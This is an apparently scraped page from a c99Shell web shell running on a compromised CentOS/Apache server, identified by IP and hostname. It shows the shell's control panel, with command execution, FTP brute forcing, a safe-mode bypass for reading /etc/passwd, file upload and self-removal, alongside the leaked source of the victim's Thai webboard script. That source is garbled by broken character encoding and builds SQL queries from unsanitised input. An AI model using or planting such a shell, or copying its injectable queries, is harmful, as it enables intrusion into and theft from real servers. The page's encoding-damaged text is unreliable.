110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/ drwxr-xr-x Free 52.82 GB of 127.8 GB (41.33%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/ drwxr-xr-x
Free 52.82 GB of 127.8 GB (41.33%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: webboard.php (12.51 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |




\n";

		echo "
	
		

		  
			">Л№йТЛЕСЎ"> ўйНБЩЕв¤Г§ЎТГ ГТВЄЧиНЛйН§·С№µКТёТГКШўГТВЄЧиНЛйН§КТёТГКШўЄШБЄ№ГТВЄЧиНЛйН§а·¤№Ф¤аАКСЄГТВЄЧиНЛйН§КТёТГіКШўИТКµГєС№±Фµ">
			
			  
			    
                  
                    єНГмґЎТГГСєКБС¤Г»ГРЄШБЗФЄТЎТГ  1-3 ѕ.¤ 50 ¶ТБ - µНє ЕиТКШґ 
                  
                  
                    
                      
                        
                            ";

echo " БХ ";

include("alluser.php"); 

?>
                            =1){

echo "БХ " .""." $users_online"."" ." ¤№ online ўіР№Хй" ;}

?>
                            
                        
                        ¤й№ЛТ¤У¶ТБ
                          
                                
                        
                        
                      
                    
                  
                
			  
			  
			  \n";

		echo "
\n";

		//echo "\t   - ¤У¶ТБ·ХиБХГЩ» \n";

		echo "\t  - ¤У¶ТБ·ХиБХ¤№µСй§гЛБиЗС№№Хй \n";

		echo "\t   - ¤У¶ТБ·ХиБХ¤№µНєЗС№№Хй\n";

		

		echo "\n\n";

		echo  "
";



	include("config.inc.php");

	$chk_date = substr(date("Y-m-d H:i:s"),-19,-9);

	

	if (empty($page)){

		$page=1;

	}



	// µФґµиН database аѕЧиННиТ№ўйНБЩЕ	

	// ЛТЁУ№З№Л№йТ·Сй§ЛБґ

	mysql_connect($host,$user,$passwd);

	$sql = "select No from webboard_data where Category='$Category'";

	$result = mysql_db_query($dbname,$sql);

	$NRow = mysql_num_rows($result);

	$rt = $NRow%$list_page;

	if($rt!=0) { 

		$totalpage = floor($NRow/$list_page)+1; 

	}

	else {

		$totalpage = floor($NRow/$list_page); 

	}

	$goto = ($page-1)*$list_page;







	// Query ўйНБЩЕµТБЁУ№З№·ХиЎУЛ№ґ

	$sql = "select * from webboard_data where Category='$Category' order by No DESC limit $goto,$list_page";

	$result = mysql_db_query($dbname,$sql);

	$NRow = mysql_num_rows($result);



	if($NRow==0) { 

		echo "";

		echo "
";

		echo "ВС§дБиБХ¤У¶ТБ аБЧиНдЛГиЁРБХ№йН

\n";

		echo "";

	}

	// бКґ§ЛСЗўйНўН§єНГмґ

	else {

		echo "\n";

		echo "\n";

		echo "\t\n";

		echo "\t\n";

		echo "\t\n";

		echo "\t\n";

		echo "\n\n";



		// З№ЕЩ»бКґ§ўйНБЩЕ·ХиНиТ№дґй

		while ($row = mysql_fetch_array($result)) {

			

			// ЎУЛ№ґКХўН§µТГТ§ аѕЧиНгЛйБХЎТГКЕСєКХ

			//$bgc = ($bgc=="lightcyan") ? "powderblue" : "lightcyan";



			$bgc = ($bgc==$rowColor1) ? $rowColor2 : $rowColor1; 



			// ЎУЛ№ґ¤иТµСЗб»Г

			$No = sprintf("%05d",$row["No"]);

			$Question = $row["Question"];

			$Name = $row["Name"];

			$Namer = $row["Namer"];

			$Member = $row["Member"];

			$Memberr = $row["Memberr"];

			$nphoto = $row["nphoto"];

			$ckDate = trim(substr($row["Date"],-19,-9)); // бКґ§а©ѕТРЗС№·Хи

			$Date = convert_date($row["Date"]);

			$Reply = $row["Reply"];



			$ckReplyDate = trim(substr($row["ReplyDate"],-19,-9)); 

			$ReplyDate = convert_date($row["ReplyDate"]);

			$pageviewdata = $row["pageview"];

			// бКґ§а©ѕТРЗС№·Хи

			if($Date==$chk_date) {

				echo "\n";

					

				}elseif($ReplyDate==$chk_date) {



				echo "\n";	

		}else {

			echo "\n";			

				}

			// бКґ§ГЩ» folder

			

					////new

			     

               if($Reply>="10" )

				    

				{

			    echo "\t\n";

		       }

			 elseif($ReplyDate!="") 

			         

			           {

				    echo "\t\n";

				      } 

             elseif($Date==$chk_date) 

				{

				echo "\t\n";

				      } 

					  

				     else {

				    echo "\t\n";

				           }





			if(($ckReplyDate==$chk_date)&&($nphoto!='')&&($ckDate==$chk_date))			{

			echo "\t\n";

			}

			elseif(($ckReplyDate==$chk_date)&&($nphoto!=''))			{

			echo "\t\n";

			}

			elseif(($ckReplyDate==$chk_date) &&($ckDate==$chk_date))

				{echo "\t\n";

				      } 

			elseif($ckReplyDate==$chk_date)

				{echo "\t\n";

				      } 

					  elseif(($nphoto!='') &&($ckDate==$chk_date))

				{echo "\t\n";

				

				      } 

					

					  elseif($nphoto!='') 

				{echo "\t\n";

				

				      } 

					

					   elseif($ckDate==$chk_date) 

				{echo "\t\n";

				

				      } 

			



			else{

				echo "\t\n";

			         }			



			if($Member) {

				echo "\t\n";

			}

			else {

				echo "\t\n";

			}

			

			// µГЗЁКНєЗиТБХ¤№µНє¤У¶ТБЛГЧНВС§

if($Memberr) {

			if($ckReplyDate!="" ) 

				{

				echo "\t\n";

			    }

			else 

				{

				echo "\t\n";

			    }

			echo "\n\n";

			

		}else{

		if($ckReplyDate!="" ) 

				{

				echo "\t\n";

			    }

			else 

				{

				echo "\t\n";

			    }

			echo "\n\n";

		}

		

		}

		

		echo "¤У¶ТБ·Хи ¤У¶ТБ-[ЁУ№З№¤УµНє] [ЁУ№З№¤№аўйТНиТ№] јЩй¶ТБ[ЗС№·Хи¶ТБ] јЩйµНє[ЗС№·ХиµНє]
 $No  $No  $No  $No $Question   [ $Reply ] [ $pageviewdata ] $Question   [ $Reply ] [ $pageviewdata ] $Question    [ $Reply ] [ $pageviewdata ] $Question   [ $Reply ]   [ $pageviewdata ] $Question   [ $Reply ] [ $pageviewdata ] $Question   [ $Reply ] [ $pageviewdata ] $Question   [ $Reply ] [ $pageviewdata ] $Question [ $Reply ] [ $pageviewdata ] $Name   [$Date] $Name  [$Date] $Namer  [$ReplyDate]  ВС§дБиБХ¤№µНє 
 $Namer [$ReplyDate]  ВС§дБиБХ¤№µНє \n\n";

		

		

		

		// table НёФєТВ¤ЗТБЛБТВўН§ГЩ»

		

		echo "\n";

		echo "\n";

		echo "\n";

		echo "\t - ¤У¶ТБгЛБи \n";

		echo "\t - ¤У¶ТБаЎиТ \n";

		echo "\t - ¤У¶ТБ·Хи¶ЩЎµНєбЕйЗ\n";

		echo "\t - ¤У¶ТБ·ХиБХ¤№µНєБТЎ\n";

		echo "\t - ¤У¶ТБ·ХиБХГЩ»\n";

		echo "\t - КБТЄФЎаЗзєєНГмґ\n";

		echo "\n\n";



		// table бКґ§аЕўЛ№йТ

		echo "\n";

		echo "\n";

		echo "\n";

		echo "\n";

		echo "\t\n";



		// КГйТ§ link аѕЧиНд»Л№йТЎиН№-Л№йТ¶Сґд»

		if($page>1 && $page<=$totalpage) {

			$prevpage = $page-1;

			echo "\t[Л№йТЎиН№ = $prevpage]\n";

		}



		echo "\t ЎУЕС§бКґ§Л№йТ·Хи $page/$totalpage \n";



		if($page!=$totalpage) {

			$nextpage = $page+1;

			echo "\t[Л№йТ¶Сґд» = $nextpage]\n";

		}



		echo "\t\n";

		echo "
\n";



		// З№ЕЩ»бКґ§аЕўЛ№йТ·Сй§ЛБґ

		for($i=1 ; $i<$page ; $i++) {

			echo "\t$i \n";

		}

		echo "\t$page \n";

		for($i=$page+1 ; $i<=$totalpage ; $i++) {

			echo "\t$i \n";

		}

	

		echo "\n";

	}

?>
			  
			
		
		  

		  
		  " size="2">

bool(false)

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0061 ]--